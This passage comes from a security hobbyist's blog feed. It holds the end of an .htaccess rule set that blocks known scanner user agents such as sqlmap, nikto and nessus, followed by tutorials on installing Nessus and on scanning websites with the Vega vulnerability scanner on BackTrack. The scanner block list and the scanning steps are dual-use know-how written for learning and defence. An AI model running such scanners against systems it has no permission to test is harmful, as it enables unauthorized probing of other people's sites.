RewriteCond %{HTTP_USER_AGENT} dirbuster [NC,OR]<br />
RewriteCond %{HTTP_USER_AGENT} nikto [NC,OR]<br />
RewriteCond %{HTTP_USER_AGENT} SF [OR]<br />
RewriteCond %{HTTP_USER_AGENT} sqlmap [NC,OR]<br />
RewriteCond %{HTTP_USER_AGENT} fimap [NC,OR]<br />
RewriteCond %{HTTP_USER_AGENT} nessus [NC,OR]<br />
RewriteCond %{HTTP_USER_AGENT} whatweb [NC,OR]<br />
RewriteCond %{HTTP_USER_AGENT} Openvas [NC,OR]<br />
RewriteCond %{HTTP_USER_AGENT} jbrofuzz [NC,OR]<br />
RewriteCond %{HTTP_USER_AGENT} libwhisker [NC,OR]<br />
RewriteCond %{HTTP_USER_AGENT} webshag [NC,OR]<br />
RewriteCond %{HTTP:Acunetix-Product} ^WVS<br />
RewriteRule ^.* http://127.0.0.1/ [R=301,L]<br />
<�/�IfModule><br />
<font color="red">(Please Remove � On Original Code)</font><br />
</blockquote>after adding this content to .htaccess save it now.this is just a counter step taken to stay away from web scanners. hope you like this post do share ,comments ,like and thank you :) .Chandrakanthttp://www.blogger.com/profile/16213734564468622554noreply@blogger.com1tag:blogger.com,1999:blog-4060165147151547772.post-69956255413519247752013-12-21T14:59:00.001+05:302013-12-25T15:18:43.561+05:30installing Nessus Scanner For Network Vulnerability in Backtrackuhh...hi everyone after a long days i have started posting tut so lets get started today we will be installing nessus scanner on backtrack and using it.<a href="http://www.darksite.co.in/2012/05/how-to-install-and-configure-best.html">Check my long old post :D </a><br />
<h3>What is Nessus is For?</h3><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-pbnxCY-pry8/UrVfLlBYacI/AAAAAAAAFSo/5Hyj477KZN4/s1600/nessus.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-pbnxCY-pry8/UrVfLlBYacI/AAAAAAAAFSo/5Hyj477KZN4/s320/nessus.jpg" /></a></div>Nessus is a network vulnerability scanning program thats give you power to find you all the Vulnerability present on the network/host . It is free for personal use. Its can detect vulnerabilities on the systems. Nessus is the most popular vulnerability scanner in the computer security. Nessus allows scans for vulnerabilities, Misconfiguration, default passwords / common passwords / blank passwords on some system accounts, etc. You can use Nessus to scan your system and patch the vulnerability. If you want install Nessus on Backtrack 5 R3 first thing to do is download it from <a href="http://www.tenable.com/products/nessus/">http://www.tenable.com/products/nessus/</a><br />
<br />
So we will discuss how we can install it online (if you are having internet connection)<br />
Nessus 4.4.1 now comes pre-installed on BackTrack 5 and requires that the user activate the installation.<br />
Here are the commands to install nessus : open terminal and type(if you don't know :P)<br />
<br />
<b>apt-get install nessus</b><br />
<br />
After install it, create an account with adduser command like this<br />
<br />
<b>/opt/nessus/sbin/nessus-adduser</b><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-SwkweRQbTY4/UrVbLiCeDcI/AAAAAAAAFSQ/CRXG3w8ZclU/s1600/BT5-Adding-User.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-SwkweRQbTY4/UrVbLiCeDcI/AAAAAAAAFSQ/CRXG3w8ZclU/s400/BT5-Adding-User.png" /></a></div>After you've entered a username, the nessus-adduser program asks you if the user account should have admin privileges or not. It is recommended that the initial user account have admin privileges so you can use the Nessus Web Interface to create subsequent accounts. The only difference between a Nessus admin user and a regular user is the ability to create user accounts.<br />
<h3>Registering Account For Nessus</h3><br />
Once you have Nessus installed on BackTrack 5, you will need to obtain a Nessus activation code. If you wish to purchase a ProfessionalFeed, you can visit the <a href="https://store.tenable.com/">Tenable Store</a>. If you are using Nessus at home or wish to evaluate Nessus, you can <a href="http://www.tenable.com/products/nessus/nessus-homefeed">register a HomeFeed</a>. It’s important to note that the HomeFeed is limited to 16 IP addresses per scan (whereas the ProfessionalFeed allows you to scan an unlimited number of IP addresses). The ProfessionalFeed also gives you access to features such as Configuration and Sensitive Data Auditing, SCADA plugins, Nessus Technical Support and access to the Tenable Customer Portal.<br />
<br />
After registering they will send you activation code to your email. After you get the key, run this command, fill change xxxx-xxxx-xxxx-xxxx-xxxx with your key<br />
<br />
<b>/opt/nessus/bin/nessus-fetch --register xxxx-xxxx-xxxx-xxxx-xxxx</b><br />
<br />
It will take some time because plugin is being updated. After the update complete, run your Nessus<br />
<br />
<b>/etc/init.d/nessusd start</b><br />
<br />
Then <b>open your browser and type</b> this in the URL of the browser<br />
<br />
<b>https://localhost:8834/</b><br />
(You can also access the Nessus Web Interface remotely/outside by using the IP address assigned to BackTrack 5 (e.g. https://192.168.37.210:8834/).)<br />
<br />
Nessus will run on the secure channel https and on the port number 8834.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-B7FcjH3YytI/UrVdkT0oTdI/AAAAAAAAFSc/A1cq0Dj8tRo/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-B7FcjH3YytI/UrVdkT0oTdI/AAAAAAAAFSc/A1cq0Dj8tRo/s320/2.png" /></a></div><br />
Now try and use Nessus for your own risk :-D..<br />
<br />
Next tutorial i will post how to scan a host and get a report using nessus scanner.if you need anyhelp on any tools do post as a comment i will definitely reply on you also i also encourage everyone to use Backtrack if you wann learn more on security things<br />
.Chandrakanthttp://www.blogger.com/profile/16213734564468622554noreply@blogger.com2tag:blogger.com,1999:blog-4060165147151547772.post-34352894060416940112013-11-12T00:02:00.004+05:302013-11-12T00:05:58.326+05:30Scanning For Web Vulnerability Using Vega Scanner On Backtrack | kalihi everyone this is one more post on another web vulnerability scanner tool.so this time we will be discussing more about a tool known as Vega.this is very simple tool to use as well as detect some quality (High) vulnerability... <br />
<br />
<b>About Vega : </b><br />
Vega is an open source scanner and testing platform to test the security of web applications. Vega can help you find and validate SQL Injection, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. <br />
Vega includes an automated scanner for quick tests and an intercepting proxy for tactical inspection.Vega can be extended using a powerful API in the language of the web: Javascript. <br />
Vega was developed by Subgraph.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-9n-0R4BHed0/UoEfRPcgMFI/AAAAAAAAFRI/dSeME-xCbbY/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="vega scanner" height="300" width="560" src="http://3.bp.blogspot.com/-9n-0R4BHed0/UoEfRPcgMFI/AAAAAAAAFRI/dSeME-xCbbY/s700/1.png" /></a></div><br />
Lets scan for a website for vulnerability as you can see you directly browse this tool on backtrack by following path.<br />
<b><br />
Bancktrack>vulnerability assessment >web application assessment >web vulnerability scanner>vega</b><br />
of course you can easily browse this by some command on terminal<br />
<b>#cd /pentest/web/vega <br />
then ./Vega</b><br />
Now on the top select scan option since it open graphical user interface of this scanner.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-bFpYlhS0ExA/UoEhFDzsFBI/AAAAAAAAFRU/Sxjw4n6LTqg/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="vega scanner" height="350" width="560" src="http://2.bp.blogspot.com/-bFpYlhS0ExA/UoEhFDzsFBI/AAAAAAAAFRU/Sxjw4n6LTqg/s640/2.png" /></a></div><br />
it will ask you for url to scan and below option which you can mark for a scan.<br />
<br />
next you can even set the login cookie if your site need any credentials for access.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-yMgLSuxKAlI/UoEhqvjV4EI/AAAAAAAAFRc/L5DPgDZEf1Q/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="vega scanner" height="300" width="560" src="http://4.bp.blogspot.com/-yMgLSuxKAlI/UoEhqvjV4EI/AAAAAAAAFRc/L5DPgDZEf1Q/s600/3.png" /></a></div><br />
next click on finish it will scan your website quickly.showing below the vulnerability count as well as url.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-xb3DAecqZ-g/UoEh9b4SKMI/AAAAAAAAFRk/J9PvzerCS3E/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="vega scanner" height="300" width="560" src="http://3.bp.blogspot.com/-xb3DAecqZ-g/UoEh9b4SKMI/AAAAAAAAFRk/J9PvzerCS3E/s600/4.png" /></a></div><br />
Next you just need to re-verify /cross check those vuln url simply by following those url and exploitation.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-jDfTgaWesUE/UoEjA4jeo6I/AAAAAAAAFRs/UtcyxKpSsIw/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="vega scanner" height="300" width="560" src="http://3.bp.blogspot.com/-jDfTgaWesUE/UoEjA4jeo6I/AAAAAAAAFRs/UtcyxKpSsIw/s600/5.png" /></a></div>you can also prepare reports easily for showing to your boss ;).<br />
have fun ... Chandrakanthttp://www.blogger.com/profile/16213734564468622554noreply@blogger.com5